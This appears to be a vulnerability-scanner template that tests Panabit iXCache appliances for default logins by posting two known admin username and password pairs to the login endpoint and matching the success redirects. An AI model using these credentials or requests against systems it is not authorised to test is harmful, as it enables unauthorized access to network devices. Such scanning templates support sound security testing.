id: yaml-poc-panabit-ixcache-unsafe_config-CT-159101
info:
  name: Yaml Poc Panabit Ixcache Unsafe_Config Ct 159101
  author: converted
  severity: high
  description: 'Converted from xpoc: yaml-poc-panabit-ixcache-unsafe_config-CT-159101'
  tags: xpoc
  reference: []
http:
- method: POST
  path:
  - /login/userverify.cgi
  body: username=admin&password=ixcache
  headers:
    Content-Type: application/x-www-form-urlencoded
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - URL=/cgi-bin/monitor.cgi
- method: POST
  path:
  - /login/userverify.cgi
  body: username=admin&password=panabit
  headers:
    Content-Type: application/x-www-form-urlencoded
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - URL=/index.htm
